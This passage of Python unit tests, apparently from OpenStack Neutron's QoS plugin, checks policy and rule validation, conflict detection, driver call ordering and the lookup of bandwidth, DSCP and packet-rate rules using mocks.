admin_ctxt = mock.Mock()
with mock.patch(
'neutron.objects.ports.Port.get_object',
return_value=port_mock
) as get_port, mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy_mock
) as get_policy, mock.patch.object(
self.qos_plugin, "validate_policy_for_port"
) as validate_policy_for_port, mock.patch.object(
self.ctxt, "elevated", return_value=admin_ctxt
):
self.qos_plugin._validate_update_port_callback(
"PORT", "precommit_update", "test_plugin",
payload=events.DBEventPayload(
self.ctxt, desired_state=kwargs['port'],
states=(kwargs['original_port'],)))
if policy_id is None or policy_id == original_policy_id:
get_port.assert_not_called()
get_policy.assert_not_called()
validate_policy_for_port.assert_not_called()
else:
get_port.assert_called_once_with(self.ctxt, id=port_id)
get_policy.assert_called_once_with(admin_ctxt, id=policy_id)
validate_policy_for_port.assert_called_once_with(
self.ctxt, policy_mock, port_mock)
def test_validate_update_port_callback_policy_changed(self):
self._test_validate_update_port_callback(
policy_id=uuidutils.generate_uuid())
def test_validate_update_port_callback_policy_not_changed(self):
policy_id = uuidutils.generate_uuid()
self._test_validate_update_port_callback(
policy_id=policy_id, original_policy_id=policy_id)
def test_validate_update_port_callback_policy_removed(self):
self._test_validate_update_port_callback(
policy_id=None, original_policy_id=uuidutils.generate_uuid())
def _test_validate_update_network_callback(self, policy_id=None,
original_policy_id=None):
network_id = uuidutils.generate_uuid()
kwargs = {
"context": self.ctxt,
"network": {
"id": network_id,
qos_consts.QOS_POLICY_ID: policy_id
},
"original_network": {
"id": network_id,
qos_consts.QOS_POLICY_ID: original_policy_id
}
}
port_mock_with_own_policy = mock.MagicMock(
id=uuidutils.generate_uuid(),
qos_policy_id=uuidutils.generate_uuid())
port_mock_without_own_policy = mock.MagicMock(
id=uuidutils.generate_uuid(), qos_policy_id=None)
ports = [port_mock_with_own_policy, port_mock_without_own_policy]
policy_mock = mock.MagicMock(id=policy_id)
admin_ctxt = mock.Mock()
with mock.patch(
'neutron.objects.ports.Port.get_objects',
return_value=ports
) as get_ports, mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy_mock
) as get_policy, mock.patch.object(
self.qos_plugin, "validate_policy_for_network"
) as validate_policy_for_network, mock.patch.object(
self.qos_plugin, "validate_policy_for_ports"
) as validate_policy_for_ports, mock.patch.object(
self.ctxt, "elevated", return_value=admin_ctxt
):
self.qos_plugin._validate_update_network_callback(
"NETWORK", "precommit_update", "test_plugin",
payload=events.DBEventPayload(
self.ctxt, desired_state=kwargs['network'],
states=(kwargs['original_network'],)))
if policy_id is None or policy_id == original_policy_id:
get_policy.assert_not_called()
validate_policy_for_network.assert_not_called()
get_ports.assert_not_called()
validate_policy_for_ports.assert_not_called()
else:
get_policy.assert_called_once_with(admin_ctxt, id=policy_id)
get_ports.assert_called_once_with(self.ctxt,
network_id=network_id)
validate_policy_for_ports.assert_called_once_with(
self.ctxt, policy_mock, [port_mock_without_own_policy])
def test_validate_update_network_callback_policy_changed(self):
self._test_validate_update_network_callback(
policy_id=uuidutils.generate_uuid())
def test_validate_update_network_callback_policy_not_changed(self):
policy_id = uuidutils.generate_uuid()
self._test_validate_update_network_callback(
policy_id=policy_id, original_policy_id=policy_id)
def test_validate_update_network_callback_policy_removed(self):
self._test_validate_update_network_callback(
policy_id=None, original_policy_id=uuidutils.generate_uuid())
def test_validate_policy_for_port_rule_not_valid(self):
port = {'id': uuidutils.generate_uuid()}
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_port",
return_value=False
):
self.policy.rules = [self.rule]
self.assertRaises(
qos_exc.QosRuleNotSupported,
self.qos_plugin.validate_policy_for_port,
self.ctxt, self.policy, port)
def test_validate_policy_for_port_all_rules_valid(self):
port = {'id': uuidutils.generate_uuid()}
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_port",
return_value=True
):
self.policy.rules = [self.rule]
try:
self.qos_plugin.validate_policy_for_port(
self.ctxt, self.policy, port)
except qos_exc.QosRuleNotSupported:
self.fail("QosRuleNotSupported exception unexpectedly raised")
def test_validate_policy_for_network(self):
network = uuidutils.generate_uuid()
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_network",
return_value=True
):
self.policy.rules = [self.rule]
try:
self.qos_plugin.validate_policy_for_network(
self.ctxt, self.policy, network_id=network)
except qos_exc.QosRuleNotSupportedByNetwork:
self.fail("QosRuleNotSupportedByNetwork "
"exception unexpectedly raised")
def test_create_min_bw_rule_on_bound_port(self):
policy = self._get_policy()
policy.rules = [self.min_bw_rule]
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='compute:fake-zone')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
self.assertRaises(
NotImplementedError,
self.qos_plugin.create_policy_minimum_bandwidth_rule,
self.ctxt, policy.id, self.rule_data)
def test_create_min_bw_rule_on_unbound_port(self):
policy = self._get_policy()
policy.rules = [self.min_bw_rule]
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
try:
self.qos_plugin.create_policy_minimum_bandwidth_rule(
self.ctxt, policy.id, self.rule_data)
except NotImplementedError:
self.fail()
@mock.patch(
'neutron.objects.rbac_db.RbacNeutronDbObjectMixin'
'.create_rbac_policy')
@mock.patch('neutron.objects.qos.policy.QosPolicy')
def test_add_policy(self, mock_qos_policy, mock_create_rbac_policy):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy, 'QosPolicy')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
self.qos_plugin.create_policy(self.ctxt, self.policy_data)
policy_mock_call = mock.call.QosPolicy().create()
create_precommit_mock_call = mock.call.driver.call(
'create_policy_precommit', self.ctxt, mock.ANY)
create_mock_call = mock.call.driver.call(
'create_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_mock_call) <
mock_manager.mock_calls.index(create_precommit_mock_call) <
mock_manager.mock_calls.index(create_mock_call))
def test_add_policy_with_extra_tenant_keyword(self, *mocks):
policy_id = uuidutils.generate_uuid()
project_id = uuidutils.generate_uuid()
tenant_policy = {
'policy': {'id': policy_id,
'project_id': project_id,
'tenant_id': project_id,
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}}
policy_details = {'id': policy_id,
'project_id': project_id,
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}
with mock.patch('neutron.objects.qos.policy.QosPolicy') as QosMocked:
self.qos_plugin.create_policy(self.ctxt, tenant_policy)
QosMocked.assert_called_once_with(self.ctxt, **policy_details)
@mock.patch.object(policy_object.QosPolicy, "get_object")
@mock.patch(
'neutron.objects.rbac_db.RbacNeutronDbObjectMixin'
'.create_rbac_policy')
@mock.patch.object(policy_object.QosPolicy, 'update')
def test_update_policy(self, mock_qos_policy_update,
mock_create_rbac_policy, mock_qos_policy_get):
mock_qos_policy_get.return_value = self.policy
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy_update, 'update')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
fields = obj_utils.get_updatable_fields(
policy_object.QosPolicy, self.policy_data['policy'])
self.qos_plugin.update_policy(
self.ctxt, self.policy.id, {'policy': fields})
self._validate_driver_params('update_policy', self.ctxt)
policy_update_mock_call = mock.call.update()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_update_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
@mock.patch('neutron.objects.db.api.get_object', return_value=None)
@mock.patch.object(policy_object.QosPolicy, 'delete')
def test_delete_policy(self, mock_qos_policy_delete, mock_api_get_policy):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy_delete, 'delete')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
self.qos_plugin.delete_policy(self.ctxt, self.policy.id)
self._validate_driver_params('delete_policy', self.ctxt)
policy_delete_mock_call = mock.call.delete()
delete_precommit_mock_call = mock.call.driver.call(
'delete_policy_precommit', self.ctxt, mock.ANY)
delete_mock_call = mock.call.driver.call(
'delete_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_delete_mock_call) <
mock_manager.mock_calls.index(delete_precommit_mock_call) <
mock_manager.mock_calls.index(delete_mock_call))
@mock.patch.object(policy_object.QosPolicy, "get_object")
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'create')
def test_create_policy_rule(self, mock_qos_rule_create,
mock_qos_policy_get):
_policy = copy.copy(self.policy)
setattr(_policy, "rules", [])
mock_qos_policy_get.return_value = _policy
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_create, 'create')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
with mock.patch('neutron.objects.qos.qos_policy_validator'
'.check_bandwidth_rule_conflict',
return_value=None), \
mock.patch(
'neutron.objects.qos.qos_policy_validator'
'.check_min_pps_rule_conflict', return_value=None):
self.qos_plugin.create_policy_bandwidth_limit_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
rule_create_mock_call = mock.call.create()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_create_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_create_policy_rule_check_rule_min_less_than_max(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.qos_plugin.create_policy_minimum_bandwidth_rule(
self.ctxt, _policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
self.mock_qos_load_attr.assert_called_once_with('rules')
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_max_more_than_min(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.qos_plugin.create_policy_bandwidth_limit_rule(
self.ctxt, _policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
self.mock_qos_load_attr.assert_called_once_with('rules')
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_bwlimit_less_than_minbw(self):
_policy = self._get_policy()
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_minbw_gr_than_bwlimit(self):
_policy = self._get_policy()
self.rule_data['minimum_bandwidth_rule']['min_kbps'] = 1000000
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_bandwidth_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
new_rule_data = {
'bandwidth_limit_rule': {
'max_kbps': 5000,
'direction': self.rule.direction
}
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'update')
def test_update_policy_rule(self, mock_qos_rule_update):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_update, 'update')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.rule.get_rules',
return_value=[self.rule]), mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
rule_update_mock_call = mock.call.update()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_update_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_update_policy_rule_check_rule_min_less_than_max(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
rules = [self.rule, self.min_bw_rule]
setattr(_policy, "rules", rules)
self.mock_qos_load_attr.reset_mock()
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_bandwidth_rule(
self.ctxt, self.min_bw_rule.id,
self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_rule_check_rule_bwlimit_less_than_minbw(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
self.rule_data['minimum_bandwidth_rule']['min_kbps'] = 1000
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_minimum_bandwidth_rule,
self.ctxt, self.min_bw_rule.id,
self.policy.id, self.rule_data)
def test_update_policy_rule_check_rule_minbw_gr_than_bwlimit(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_bandwidth_rule(
self.ctxt, self.min_bw_rule.id, self.policy.id,
self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id,
self.policy.id, self.rule_data)
def _get_policy(self):
return policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
def test_update_policy_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id,
self.rule_data)
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'delete')
def test_delete_policy_rule(self, mock_qos_rule_delete):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_delete, 'delete')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.rule])
self.qos_plugin.delete_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, _policy.id)
self._validate_driver_params('update_policy', self.ctxt)
rule_delete_mock_call = mock.call.delete()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_delete_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_delete_policy_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, _policy.id)
def test_get_policy_bandwidth_limit_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.rule.id)
def test_get_policy_bandwidth_limit_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_bandwidth_limit_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_bandwidth_limit_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_bandwidth_limit_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy,
self.ctxt, self.policy.id)
def test_get_policy_bandwidth_limit_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_get_policy_bandwidth_limit_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_bandwidth_limit_rules,
self.ctxt, self.policy.id)
def test_create_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.create_policy_dscp_marking_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.update_policy_dscp_marking_rule(
self.ctxt, self.dscp_rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.delete_policy_dscp_marking_rule(
self.ctxt, self.dscp_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_get_policy_dscp_marking_rules(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosDscpMarkingRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_dscp_marking_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_dscp_marking_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosDscpMarkingRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_dscp_marking_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, qos_policy_id=self.policy.id,
_pager=mock.ANY, filter='filter_id')
def test_get_policy_dscp_marking_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_dscp_marking_rule,
self.ctxt, self.dscp_rule.id, self.policy.id)
def test_get_policy_dscp_marking_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_dscp_marking_rules,
self.ctxt, self.policy.id)
def test_get_policy_minimum_bandwidth_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_minimum_bandwidth_rule(
self.ctxt, self.rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.rule.id)
def test_get_policy_minimum_bandwidth_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_minimum_bandwidth_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_minimum_bandwidth_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_minimum_bandwidth_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_minimum_bandwidth_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_bandwidth_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_get_policy_minimum_bandwidth_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_bandwidth_rules,
self.ctxt, self.policy.id)
def test_create_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
def test_delete_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_verify_bad_method_call(self):
self.assertRaises(AttributeError, getattr, self.qos_plugin,
'create_policy_bandwidth_limit_rules')
def test_get_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'max_kbps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_BANDWIDTH_LIMIT)
self.assertEqual(
qos_consts.RULE_TYPE_BANDWIDTH_LIMIT,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_BANDWIDTH_LIMIT)
def test_get_rule_types(self):
filters = {'type': 'type_id'}
with mock.patch.object(qos_plugin.QoSPlugin, 'supported_rule_types',
return_value=qos_consts.VALID_RULE_TYPES):
types = self.qos_plugin.get_rule_types(self.ctxt, filters=filters)
self.assertEqual(sorted(qos_consts.VALID_RULE_TYPES),
sorted(type_['type'] for type_ in types))
@mock.patch('neutron.objects.ports.Port')
@mock.patch('neutron.objects.qos.policy.QosPolicy')
def test_rule_notification_and_driver_ordering(self, qos_policy_mock,
port_mock):
rule_cls_mock = mock.Mock()
rule_cls_mock.rule_type = 'fake'
rule_actions = {'create': [self.ctxt, rule_cls_mock,
self.policy.id, {'fake_rule': {}}],
'update': [self.ctxt, rule_cls_mock,
self.rule.id,
self.policy.id, {'fake_rule': {}}],
'delete': [self.ctxt, rule_cls_mock,
self.rule.id, self.policy.id]}
mock_manager = mock.Mock()
mock_manager.attach_mock(qos_policy_mock, 'QosPolicy')
mock_manager.attach_mock(port_mock, 'Port')
mock_manager.attach_mock(rule_cls_mock, 'RuleCls')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
for action, arguments in rule_actions.items():
mock_manager.reset_mock()
method = getattr(self.qos_plugin, "%s_policy_rule" % action)
method(*arguments)
# some actions get rule from policy
get_rule_mock_call = getattr(
mock.call.QosPolicy.get_policy_obj().get_rule_by_id(),
action)()
# some actions construct rule from class reference
rule_mock_call = getattr(mock.call.RuleCls(), action)()
driver_mock_call = mock.call.driver.call('update_policy',
self.ctxt, mock.ANY)
if rule_mock_call in mock_manager.mock_calls:
action_index = mock_manager.mock_calls.index(rule_mock_call)
else:
action_index = mock_manager.mock_calls.index(
get_rule_mock_call)
self.assertLess(
action_index, mock_manager.mock_calls.index(driver_mock_call))
def test_create_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.create_policy_packet_rate_limit_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_create_policy_pps_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.pps_rule])
new_rule_data = {
'packet_rate_limit_rule': {
'max_kpps': 400,
'direction': self.pps_rule.direction
}
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_packet_rate_limit_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_update_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
